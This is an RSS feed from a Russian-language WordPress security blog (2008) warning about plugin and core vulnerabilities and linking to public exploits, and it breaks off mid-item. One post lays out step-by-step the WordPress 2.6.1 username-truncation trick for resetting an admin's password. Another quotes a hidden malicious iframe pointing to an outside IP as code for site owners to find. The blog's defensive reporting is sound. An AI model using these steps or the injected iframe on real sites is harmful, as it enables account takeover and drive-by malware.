<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="http://feeds.feedburner.com/~d/styles/rss2russianfull.xsl" type="text/xsl" media="screen"?><?xml-stylesheet href="http://feeds.feedburner.com/~d/styles/itemcontent.css" type="text/css" media="screen"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Безопасность WordPress блогов</title>
	
	<link>http://wp-guard.com</link>
	<description>Как сделать ваш WordPress блог безопасным</description>
	<pubDate>Mon, 03 Nov 2008 09:38:35 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
	<language>en</language>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/wp-guard" type="application/rss+xml" /><feedburner:emailServiceId>1645031</feedburner:emailServiceId><feedburner:feedburnerHostname>http://www.feedburner.com</feedburner:feedburnerHostname><feedburner:feedFlare href="http://add.my.yahoo.com/rss?url=http%3A%2F%2Ffeeds.feedburner.com%2Fwp-guard" src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif">Subscribe with My Yahoo!</feedburner:feedFlare><feedburner:feedFlare href="http://www.newsgator.com/ngs/subscriber/subext.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2Fwp-guard" src="http://www.newsgator.com/images/ngsub1.gif">Subscribe with NewsGator</feedburner:feedFlare><feedburner:feedFlare href="http://feeds.my.aol.com/add.jsp?url=http%3A%2F%2Ffeeds.feedburner.com%2Fwp-guard" src="http://o.aolcdn.com/favorites.my.aol.com/webmaster/ffclient/webroot/locale/en-US/images/myAOLButtonSmall.gif">Subscribe with My AOL</feedburner:feedFlare><feedburner:feedFlare href="http://www.rojo.com/add-subscription?resource=http%3A%2F%2Ffeeds.feedburner.com%2Fwp-guard" src="http://blog.rojo.com/RojoWideRed.gif">Subscribe with Rojo</feedburner:feedFlare><feedburner:feedFlare href="http://www.bloglines.com/sub/http://feeds.feedburner.com/wp-guard" src="http://www.bloglines.com/images/sub_modern11.gif">Subscribe with Bloglines</feedburner:feedFlare><feedburner:feedFlare href="http://www.netvibes.com/subscribe.php?url=http%3A%2F%2Ffeeds.feedburner.com%2Fwp-guard" src="http://www.netvibes.com/img/add2netvibes.gif">Subscribe with Netvibes</feedburner:feedFlare><feedburner:feedFlare href="http://fusion.google.com/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2Fwp-guard" src="http://buttons.googlesyndication.com/fusion/add.gif">Subscribe with Google</feedburner:feedFlare><feedburner:feedFlare href="http://www.pageflakes.com/subscribe.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2Fwp-guard" src="http://www.pageflakes.com/ImageFile.ashx?instanceId=Static_4&amp;fileName=ATP_blu_91x17.gif">Subscribe with Pageflakes</feedburner:feedFlare><item>
		<title>Уязвимости в плагинах Media Holder и e-Commerce</title>
		<link>http://feeds.feedburner.com/~r/wp-guard/~3/440798169/</link>
		<comments>http://wp-guard.com/uyazvimosti-v-plaginax-e-commerce-media-holder/#comments</comments>
		<pubDate>Mon, 03 Nov 2008 09:38:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Безопасность]]></category>

		<category><![CDATA[Плагины]]></category>

		<category><![CDATA[Уязвимости]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=31</guid>
		<description><![CDATA[Найдены уязвимости в Wordpress-плагинах Media Holder и E-Commerce.
На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога.
Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп.
Плагин e-Commerce используется для создания интернет-магазина на основе вашего Wordpress-блога.
Уязвимость в плагине Wordpress Media Holder связана с ошибкой обработки данных при работе [...]]]></description>
			<content:encoded><![CDATA[<p>Найдены уязвимости в Wordpress-плагинах Media Holder и E-Commerce.</p>
<p>На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога.</p>
<p>Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп.</p>
<p>Плагин e-Commerce используется для создания интернет-магазина на основе вашего Wordpress-блога.</p>
<p>Уязвимость в плагине Wordpress Media Holder связана с ошибкой обработки данных при работе с базой MySQL вашего блога. Эксплоит можно просмотреть <a href="http://www.milw0rm.com/exploits/6842" title="Безопаность Wordpress блогов" onclick="javascript:pageTracker._trackPageview ('/outbound/www.milw0rm.com');">здесь</a>.</p>
<p>Уязвимость в плагине Wordpress e-Commerce связана с неправильной обработкой загружаемых на сервер файлов. Эксплоит можно посмотреть <a href="http://www.milw0rm.com/exploits/6867" title="Безопаность Wordpress блогов" onclick="javascript:pageTracker._trackPageview ('/outbound/www.milw0rm.com');">здесь</a>.</p>
<p>Если вы используете один из этих плагинов в своем блоге, отключите их до тех пор, пока появится обновление, которое исправляет данные уязвимости.</p>
<p>Для борьбы с уязвимостями которые используют базу данных MySQL в Wordpress-блоге, возможно будет полезно изменение префикса таблиц, при установке блога, либо если блог уже установлен со стандартным префиксом wp_ воспользуйтесь плагином, который <a href="http://blogproblog.com/menyaem-prefiks-tablic-v-wordpress-bloge/" title="Плагин Wordpress для изменения префикса таблиц" onclick="javascript:pageTracker._trackPageview ('/outbound/blogproblog.com');">изменяет префиксы таблиц</a>, в уже существующем блоге.</p>

	<h4>Связанные записи</h4>
	<ul class="st-related-posts">
	<li><a href="http://wp-guard.com/uyazvimosti-v-contact-form-dlya-wordpress/" title="Уязвимости в Contact Form ][ для Wordpress (Август 14, 2008)">Уязвимости в Contact Form ][ для Wordpress</a> (0)</li>
	<li><a href="http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/" title="Уязвимость усечения данных в SQL Wordpress 2.6.1 (Сентябрь 8, 2008)">Уязвимость усечения данных в SQL Wordpress 2.6.1</a> (3)</li>
	<li><a href="http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/" title="Уязвимость секретного ключа в wordpress 2.5 (Июнь 11, 2008)">Уязвимость секретного ключа в wordpress 2.5</a> (6)</li>
	<li><a href="http://wp-guard.com/wp-photo-album-vulnerability/" title="Уязвимость плагина WP-Photo-Album (Февраль 16, 2008)">Уязвимость плагина WP-Photo-Album</a> (0)</li>
	<li><a href="http://wp-guard.com/uyazvimost-v-plagine-wordpress-spreadsheet-06/" title="Уязвимость в плагине Wordpress Spreadsheet 0.6 (Апрель 23, 2008)">Уязвимость в плагине Wordpress Spreadsheet 0.6</a> (0)</li>
</ul>

<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/wp-guard?a=FgXlN"><img src="http://feeds.feedburner.com/~f/wp-guard?i=FgXlN" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/wp-guard/~4/440798169" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/uyazvimosti-v-plaginax-e-commerce-media-holder/feed/</wfw:commentRss>
		<feedburner:awareness>http://api.feedburner.com/awareness/1.0/GetItemData?uri=wp-guard&amp;itemurl=http%3A%2F%2Fwp-guard.com%2Fuyazvimosti-v-plaginax-e-commerce-media-holder%2F</feedburner:awareness><feedburner:origLink>http://wp-guard.com/uyazvimosti-v-plaginax-e-commerce-media-holder/</feedburner:origLink></item>
		<item>
		<title>Уязвимость SQL-инъекции в плагине WP Comment Remix</title>
		<link>http://feeds.feedburner.com/~r/wp-guard/~3/428249308/</link>
		<comments>http://wp-guard.com/uyazvimost-sql-inekcii-v-plagine-wp-comment-remix/#comments</comments>
		<pubDate>Wed, 22 Oct 2008 06:16:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Плагины]]></category>

		<category><![CDATA[Уязвимости]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=29</guid>
		<description><![CDATA[Найдена уязвимость в плагине Wordpress - WP Comment Remix. Плагин предназначается для улучшения функций комментирования. Позволяет добавить функции цитирования и ответа на комментарии.
На эту уязвимость уже написан эксплоит, который позволяет извлечь из блога-жертвы очень много, важных данных, таких как:

Настройки блога и активные плагины
Список пользователей блога
Список администраторов блога

Сам эскплоит можно скачать здесь.
Для закрытия уязвимости, либо отключите [...]]]></description>
			<content:encoded><![CDATA[<p>Найдена уязвимость в плагине Wordpress - WP Comment Remix. Плагин предназначается для улучшения функций комментирования. Позволяет добавить функции цитирования и ответа на комментарии.</p>
<p>На эту уязвимость уже написан эксплоит, который позволяет извлечь из блога-жертвы очень много, важных данных, таких как:</p>
<ul>
<li>Настройки блога и активные плагины</li>
<li>Список пользователей блога</li>
<li>Список администраторов блога</li>
</ul>
<p>Сам эскплоит можно скачать <a href="http://www.milw0rm.com/exploits/6747" onclick="javascript:pageTracker._trackPageview ('/outbound/www.milw0rm.com');">здесь</a>.</p>
<p>Для закрытия уязвимости, либо отключите плагин, либо смените префикс таблиц, в базе данных вашего блога со стандартного wp_ на что-то типа dsf342h_</p>

	<h4>Связанные записи</h4>
	<ul class="st-related-posts">
	<li><a href="http://wp-guard.com/wp-photo-album-vulnerability/" title="Уязвимость плагина WP-Photo-Album (Февраль 16, 2008)">Уязвимость плагина WP-Photo-Album</a> (0)</li>
	<li><a href="http://wp-guard.com/uyazvimost-v-plagine-wordpress-spreadsheet-06/" title="Уязвимость в плагине Wordpress Spreadsheet 0.6 (Апрель 23, 2008)">Уязвимость в плагине Wordpress Spreadsheet 0.6</a> (0)</li>
	<li><a href="http://wp-guard.com/advisories-wp-plugins-2702/" title="Уязвимости в плагинах wp-people, Simple Forum, WP Photo Album, Search Unleashed, Sniplets (Февраль 27, 2008)">Уязвимости в плагинах wp-people, Simple Forum, WP Photo Album, Search Unleashed, Sniplets</a> (0)</li>
	<li><a href="http://wp-guard.com/uyazvimosti-v-plaginax-wp-calc-i-wp-adserv/" title="Уязвимости в плагинах wp-calc и wp-adserv (Февраль 4, 2008)">Уязвимости в плагинах wp-calc и wp-adserv</a> (0)</li>
	<li><a href="http://wp-guard.com/uyazvimosti-v-plaginax-e-commerce-media-holder/" title="Уязвимости в плагинах Media Holder и e-Commerce (Ноябрь 3, 2008)">Уязвимости в плагинах Media Holder и e-Commerce</a> (0)</li>
</ul>

<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/wp-guard?a=anzKM"><img src="http://feeds.feedburner.com/~f/wp-guard?i=anzKM" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/wp-guard/~4/428249308" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/uyazvimost-sql-inekcii-v-plagine-wp-comment-remix/feed/</wfw:commentRss>
		<feedburner:awareness>http://api.feedburner.com/awareness/1.0/GetItemData?uri=wp-guard&amp;itemurl=http%3A%2F%2Fwp-guard.com%2Fuyazvimost-sql-inekcii-v-plagine-wp-comment-remix%2F</feedburner:awareness><feedburner:origLink>http://wp-guard.com/uyazvimost-sql-inekcii-v-plagine-wp-comment-remix/</feedburner:origLink></item>
		<item>
		<title>Уязвимость усечения данных в SQL Wordpress 2.6.1</title>
		<link>http://feeds.feedburner.com/~r/wp-guard/~3/386467922/</link>
		<comments>http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/#comments</comments>
		<pubDate>Mon, 08 Sep 2008 08:00:29 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Безопасность]]></category>

		<category><![CDATA[Уязвимости]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[Пароли]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=27</guid>
		<description><![CDATA[Найдена новая уязвимость в Wordpress 2.6.1 которая заключается в ошибке усечения данных в базе SQL.

Идем по ссылке server.com/wp-login.php?action=register
Регистрируемся как пользователь "admin                         x" и Ваш email
Логин выглядит как admin[55 пробелов]х
После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword
В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора.
Получаем письмо с ссылкой на сброс [...]]]></description>
			<content:encoded><![CDATA[<p>Найдена новая уязвимость в <a href="http://blogproblog.com" title="Создание блога Wordpress" onclick="javascript:pageTracker._trackPageview ('/outbound/blogproblog.com');">Wordpress</a> 2.6.1 которая заключается в ошибке усечения данных в базе SQL.</p>
<ol>
<li>Идем по ссылке server.com/wp-login.php?action=register</li>
<li>Регистрируемся как пользователь "admin                         x" и Ваш email</li>
<li>Логин выглядит как admin[55 пробелов]х</li>
<li>После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword</li>
<li>В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора.</li>
<li>Получаем письмо с ссылкой на сброс пароля, сбрасываем пароль администратора. Новый пароль прийдет на email, но правда уже не на Ваш, а на email <a href="http://www.artlebedev.ru" onclick="javascript:pageTracker._trackPageview ('/outbound/www.artlebedev.ru');">настоящего</a> администратора блога.</li>
</ol>

	<h4>Связанные записи</h4>
	<ul class="st-related-posts">
	<li><a href="http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/" title="Уязвимость секретного ключа в wordpress 2.5 (Июнь 11, 2008)">Уязвимость секретного ключа в wordpress 2.5</a> (6)</li>
	<li><a href="http://wp-guard.com/uyazvimosti-v-contact-form-dlya-wordpress/" title="Уязвимости в Contact Form ][ для Wordpress (Август 14, 2008)">Уязвимости в Contact Form ][ для Wordpress</a> (0)</li>
	<li><a href="http://wp-guard.com/uyazvimost-wordpress-plugin-download-manager-02/" title="Уязвимость Wordpress Plugin Download Manager 0.2 (Июль 26, 2008)">Уязвимость Wordpress Plugin Download Manager 0.2</a> (0)</li>
	<li><a href="http://wp-guard.com/uyazvimosti-v-plaginax-e-commerce-media-holder/" title="Уязвимости в плагинах Media Holder и e-Commerce (Ноябрь 3, 2008)">Уязвимости в плагинах Media Holder и e-Commerce</a> (0)</li>
	<li><a href="http://wp-guard.com/srochnoe-obnovlenie-bezopasnosti-wordpress-233/" title="Срочное обновление безопасности WordPress 2.3.3 (Февраль 5, 2008)">Срочное обновление безопасности WordPress 2.3.3</a> (0)</li>
</ul>

<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/wp-guard?a=QKxpL"><img src="http://feeds.feedburner.com/~f/wp-guard?i=QKxpL" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/wp-guard/~4/386467922" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/feed/</wfw:commentRss>
		<feedburner:awareness>http://api.feedburner.com/awareness/1.0/GetItemData?uri=wp-guard&amp;itemurl=http%3A%2F%2Fwp-guard.com%2Fsql_vuln_admin_password_wp_2_6_1%2F</feedburner:awareness><feedburner:origLink>http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/</feedburner:origLink></item>
		<item>
		<title>Уязвимости в Contact Form ][ для Wordpress</title>
		<link>http://feeds.feedburner.com/~r/wp-guard/~3/364638238/</link>
		<comments>http://wp-guard.com/uyazvimosti-v-contact-form-dlya-wordpress/#comments</comments>
		<pubDate>Thu, 14 Aug 2008 08:59:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Плагины]]></category>

		<category><![CDATA[Уязвимости]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[Безопасность]]></category>

		<category><![CDATA[Контактная форма]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=25</guid>
		<description><![CDATA[Найдена уязвимость в плагинах контактной формы Wordpress - Contact Form версии 2.0.13 и ниже.
Плохая защита от ботов: отсутствие капчи, позволяет спам-ботам отправлять неограниченное количество спам-сообщений администратору сайта.
Использование функционала для рассылки спама: в форме контактов есть поле которое называется "Отправить копию самому себе", это настраивается в настройках плагина (CarbonCopy Ability), используя это поле, спам можно отправлять [...]]]></description>
			<content:encoded><![CDATA[<p>Найдена уязвимость в плагинах контактной формы Wordpress - Contact Form версии 2.0.13 и ниже.</p>
<p><strong>Плохая защита от ботов</strong>: отсутствие капчи, позволяет спам-ботам отправлять неограниченное количество спам-сообщений администратору сайта.</p>
<p><strong>Использование функционала для рассылки спама</strong>: в форме контактов есть поле которое называется "Отправить копию самому себе", это настраивается в настройках плагина (CarbonCopy Ability), используя это поле, спам можно отправлять не только администратору сайта но и другим людям.</p>
<p>Используя эти две уязвимости, можно превратить контактную форму в инструмент по рассылке спама, большому количеству людей.</p>
<p>Источник: <a href="http://websecurity.com.ua/2328/" onclick="javascript:pageTracker._trackPageview ('/outbound/websecurity.com.ua');">WebSecurity</a>.</p>
<p>В своих блогах и своим заказчикам я устанавливаю <a href="http://blogproblog.com/wordpress-contact-form/" onclick="javascript:pageTracker._trackPageview ('/outbound/blogproblog.com');">контактную форму Wordpress</a> с помощью плагина Wordpress Contact Form III, там присутствует проверка от спам-ботов.</p>

	<h4>Связанные записи</h4>
	<ul class="st-related-posts">
	<li><a href="http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/" title="Уязвимость усечения данных в SQL Wordpress 2.6.1 (Сентябрь 8, 2008)">Уязвимость усечения данных в SQL Wordpress 2.6.1</a> (3)</li>
	<li><a href="http://wp-guard.com/uyazvimosti-v-plaginax-e-commerce-media-holder/" title="Уязвимости в плагинах Media Holder и e-Commerce (Ноябрь 3, 2008)">Уязвимости в плагинах Media Holder и e-Commerce</a> (0)</li>
	<li><a href="http://wp-guard.com/wp-no-version-update/" title="Обновлен плагин wp-no-version (Февраль 13, 2008)">Обновлен плагин wp-no-version</a> (0)</li>
	<li><a href="http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/" title="Уязвимость секретного ключа в wordpress 2.5 (Июнь 11, 2008)">Уязвимость секретного ключа в wordpress 2.5</a> (6)</li>
	<li><a href="http://wp-guard.com/wp-photo-album-vulnerability/" title="Уязвимость плагина WP-Photo-Album (Февраль 16, 2008)">Уязвимость плагина WP-Photo-Album</a> (0)</li>
</ul>

<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/wp-guard?a=KIIgwK"><img src="http://feeds.feedburner.com/~f/wp-guard?i=KIIgwK" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/wp-guard/~4/364638238" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/uyazvimosti-v-contact-form-dlya-wordpress/feed/</wfw:commentRss>
		<feedburner:awareness>http://api.feedburner.com/awareness/1.0/GetItemData?uri=wp-guard&amp;itemurl=http%3A%2F%2Fwp-guard.com%2Fuyazvimosti-v-contact-form-dlya-wordpress%2F</feedburner:awareness><feedburner:origLink>http://wp-guard.com/uyazvimosti-v-contact-form-dlya-wordpress/</feedburner:origLink></item>
		<item>
		<title>Секретные ключи в Wordpress 2.6</title>
		<link>http://feeds.feedburner.com/~r/wp-guard/~3/348251288/</link>
		<comments>http://wp-guard.com/sekretnye-klyuchi-v-wordpress-26/#comments</comments>
		<pubDate>Mon, 28 Jul 2008 09:28:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Безопасность]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[Конфигурация]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=22</guid>
		<description><![CDATA[Продолжая тему о уязвимости секретного ключа в файле конфигурации Wordpress, хочу обратить ваше внимание на то, что в новой версии Wordpress 2.6, кроме строчки “SECRET_KEY“ есть еще две, на которые также необходимо обращать внимание при установке или обновлении Wordpress блога.
Строчки эти выглядят вот так:
define('AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.
define('SECURE_AUTH_KEY', 'впишите сюда [...]]]></description>
			<content:encoded><![CDATA[<p>Продолжая тему о <a href="http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/">уязвимости секретного ключа</a> в файле конфигурации Wordpress, хочу обратить ваше внимание на то, что в новой версии Wordpress 2.6, кроме строчки “<strong>SECRET_KEY</strong>“ есть еще две, на которые также необходимо обращать внимание при установке или обновлении <a href="http://blogproblog.com" title="Создание и поддержка Wordpress блогов" onclick="javascript:pageTracker._trackPageview ('/outbound/blogproblog.com');">Wordpress блога</a>.</p>
<p>Строчки эти выглядят вот так:</p>
<blockquote><p>define('AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.<br />
define('SECURE_AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.<br />
define('LOGGED_IN_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.</p></blockquote>
<p>Значение каждого параметра должно быть уникальным, сложным и длинным. Что бы не утруждать себя выдумыванием этих значений, вы можете воспользоваться специальным <a href="http://api.wordpress.org/secret-key/1.1/" onclick="javascript:pageTracker._trackPageview ('/outbound/api.wordpress.org');">сервисом Wordpress</a>, который генерирует эти три строчки для вашего файла конфигурации.</p>
<p>Просто откройте эту <a href="http://api.wordpress.org/secret-key/1.1/" onclick="javascript:pageTracker._trackPageview ('/outbound/api.wordpress.org');">страничку</a>, и скопируйте код в файл конфигурации вашего Wordpress блога <strong>wp-config.php</strong>, вот и все, теперь проблема с уникальными ключами вашего блога решена и ваш блог стал еще более защищённым.</p>
<p><tt>Блоговодство:</tt></p>
<ul>
<li><a href="http://tods-blog.com.ua/seo-smo/smo/traffic-from-feedmares-blogupp/" onclick="javascript:pageTracker._trackPageview ('/outbound/tods-blog.com.ua');">Сервисы для привлечения траффика на блог</a></li>
<li><a href="http://bizdesign.com.ua/idealnyjj-sajjt-ili-otrezvlyaem-naivnykh%E2%80%A6/" onclick="javascript:pageTracker._trackPageview ('/outbound/bizdesign.com.ua');">Про идеальный сайт</a></li>
<li><a href="http://www.profithunter.ru/optimizaciya/vyyavlenie-dublirovannogo-kontenta-na-sajte/" onclick="javascript:pageTracker._trackPageview ('/outbound/www.profithunter.ru');">Выявление дублированного контента на сайте</a></li>
</ul>

	<h4>Связанные записи</h4>
	<ul class="st-related-posts">
	<li><a href="http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/" title="Уязвимость усечения данных в SQL Wordpress 2.6.1 (Сентябрь 8, 2008)">Уязвимость усечения данных в SQL Wordpress 2.6.1</a> (3)</li>
	<li><a href="http://wp-guard.com/uyazvimosti-v-contact-form-dlya-wordpress/" title="Уязвимости в Contact Form ][ для Wordpress (Август 14, 2008)">Уязвимости в Contact Form ][ для Wordpress</a> (0)</li>
	<li><a href="http://wp-guard.com/srochnoe-obnovlenie-bezopasnosti-wordpress-233/" title="Срочное обновление безопасности WordPress 2.3.3 (Февраль 5, 2008)">Срочное обновление безопасности WordPress 2.3.3</a> (0)</li>
	<li><a href="http://wp-guard.com/wp-no-version-update/" title="Обновлен плагин wp-no-version (Февраль 13, 2008)">Обновлен плагин wp-no-version</a> (0)</li>
	<li><a href="http://wp-guard.com/gostevoj-post-v-bloge-antona-popova/" title="Гостевой пост в блоге Антона Попова. (Февраль 8, 2008)">Гостевой пост в блоге Антона Попова.</a> (0)</li>
</ul>

<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/wp-guard?a=UN4AdJ"><img src="http://feeds.feedburner.com/~f/wp-guard?i=UN4AdJ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/wp-guard/~4/348251288" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/sekretnye-klyuchi-v-wordpress-26/feed/</wfw:commentRss>
		<feedburner:awareness>http://api.feedburner.com/awareness/1.0/GetItemData?uri=wp-guard&amp;itemurl=http%3A%2F%2Fwp-guard.com%2Fsekretnye-klyuchi-v-wordpress-26%2F</feedburner:awareness><feedburner:origLink>http://wp-guard.com/sekretnye-klyuchi-v-wordpress-26/</feedburner:origLink></item>
		<item>
		<title>Внимание вирус!</title>
		<link>http://feeds.feedburner.com/~r/wp-guard/~3/347611678/</link>
		<comments>http://wp-guard.com/badware/#comments</comments>
		<pubDate>Sun, 27 Jul 2008 18:03:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Безопасность]]></category>

		<category><![CDATA[Информация]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[Вирусы]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=20</guid>
		<description><![CDATA[Вчера на одном из сайтов заказчиков, был обнаружен код, который определяется Google как вирусный код, все сайты которые содержат эту строчку, попадают сразу в категорию опасных сайтов, поэтому будьте внимательны и проверьте файлы своего сайта и посты, на наличие подобного кода.
&#60;!-- Traffic Statistics --&#62; &#60;iframe src=хттп://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0&#62;&#60;/iframe&#62; &#60;!-- End Traffic Statistics --&#62;
Если у [...]]]></description>
			<content:encoded><![CDATA[<p>Вчера на одном из сайтов заказчиков, был обнаружен код, который определяется <a href="http://www.google.com" onclick="javascript:pageTracker._trackPageview ('/outbound/www.google.com');">Google</a> как вирусный код, все сайты которые содержат эту строчку, попадают сразу в категорию опасных сайтов, поэтому будьте внимательны и проверьте файлы своего сайта и посты, на наличие подобного кода.</p>
<p>&lt;!-- Traffic Statistics --&gt; &lt;iframe src=хттп://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0&gt;&lt;/iframe&gt; &lt;!-- End Traffic Statistics --&gt;</p>
<p>Если у вас нашлось что-то подобное, ознакомьтесь с этим <a href="http://wp-guard.com/ne-soxranyajte-paroli-v-ftp-programmax/">постом</a>.</p>

	<h4>Связанные записи</h4>
	<ul class="st-related-posts">
	<li><a href="http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/" title="Уязвимость усечения данных в SQL Wordpress 2.6.1 (Сентябрь 8, 2008)">Уязвимость усечения данных в SQL Wordpress 2.6.1</a> (3)</li>
	<li><a href="http://wp-guard.com/uyazvimosti-v-contact-form-dlya-wordpress/" title="Уязвимости в Contact Form ][ для Wordpress (Август 14, 2008)">Уязвимости в Contact Form ][ для Wordpress</a> (0)</li>
	<li><a href="http://wp-guard.com/srochnoe-obnovlenie-bezopasnosti-wordpress-233/" title="Срочное обновление безопасности WordPress 2.3.3 (Февраль 5, 2008)">Срочное обновление безопасности WordPress 2.3.3</a> (0)</li>
	<li><a href="http://wp-guard.com/sekretnye-klyuchi-v-wordpress-26/" title="Секретные ключи в Wordpress 2.6 (Июль 28, 2008)">Секретные ключи в Wordpress 2.6</a> (0)</li>
	<li><a href="http://wp-guard.com/wp-no-version-update/" title="Обновлен плагин wp-no-version (Февраль 13, 2008)">Обновлен плагин wp-no-version</a> (0)</li>
</ul>

<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/wp-guard?a=NXL1iJ"><img src="http://feeds.feedburner.com/~f/wp-guard?i=NXL1iJ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/wp-guard/~4/347611678" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://wp-guard.com/badware/feed/</wfw:commentRss>
		<feedburner:awareness>http://api.feedburner.com/awareness/1.0/GetItemData?uri=wp-guard&amp;itemurl=http%3A%2F%2Fwp-guard.com%2Fbadware%2F</feedburner:awareness><feedburner:origLink>http://wp-guard.com/badware/</feedburner:origLink></item>
		<item>
		<title>Уязвимость Wordpress Plugin Download Manager 0.2</title>
		<link>http://feeds.feedburner.com/~r/wp-guard/~3/346432693/</link>
		<comments>http://wp-guard.com/uyazvimost-wordpress-plugin-download-manager-02/#comments</comments>
		<pubDate>Sat, 26 Jul 2008 08:08:25 +0000</pubDate>
		<dc:creator>admin</dc:creator>
		
		<category><![CDATA[Уязвимости]]></category>

		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://wp-guard.com/?p=18</guid>
		<description><![CDATA[Уязвимость в данном скрипте, дает возможность атакующему закачать любой файл, на сервер. Это становится возможным из-за ошибки проверки входных данных в файле upload.php.
Исправления данной ошибки пока не существует, возможно будет выпущен патч, или ошибка будет исправлена в следующей версии Wordpress.
Пример использования данной уязвимости.

	Связанные записи
	
	Уязвимость усечения данных в SQL Wordpress 2.6.1 (3)
	Уязвимости в Contact Form ][ [...]]]></description>
			<content:encoded><![CDATA[<p>Уязвимость в данном скрипте, дает возможность атакующему закачать любой файл, на сервер. Это становится возможным из-за ошибки проверки входных данных в файле <strong>upload.php</strong>.</p>
<p>Исправления данной ошибки пока не существует, возможно будет выпущен патч, или ошибка будет исправлена в следующей версии Wordpress.</p>
<p><a href="http://www.milw0rm.com/exploits/6127" onclick="javascript:pageTracker._trackPageview ('/outbound/www.milw0rm.com');">Пример</a> использования данной уязвимости.</p>

	<h4>Связанные записи</h4>
	<ul class="st-related-posts">
	<li><a href="http://wp-guard.com/sql_vuln_admin_password_wp_2_6_1/" title="Уязвимость усечения данных в SQL Wordpress 2.6.1 (Сентябрь 8, 2008)">Уязвимость усечения данных в SQL Wordpress 2.6.1</a> (3)</li>
	<li><a href="http://wp-guard.com/uyazvimosti-v-contact-form-dlya-wordpress/" title="Уязвимости в Contact Form ][ для Wordpress (Август 14, 2008)">Уязвимости в Contact Form ][ для Wordpress</a> (0)</li>
	<li><a href="http://wp-guard.com/uyazvimost-sekretnogo-klyucha-v-wordpress-25/" title="Уязвимость секретного ключа в wordpress 2.5 (Июнь 11, 2008)">Уязвимость секретного ключа в wordpress 2.5</a> (6)</li>
	<li><a href="http://wp-guard.com/wp-photo-album-vulnerability/" title="Уязвимость плагина WP-Photo-Album (Февраль 16, 2008)">Уязвимость плагина WP-Photo-Album</a> (0)</li>
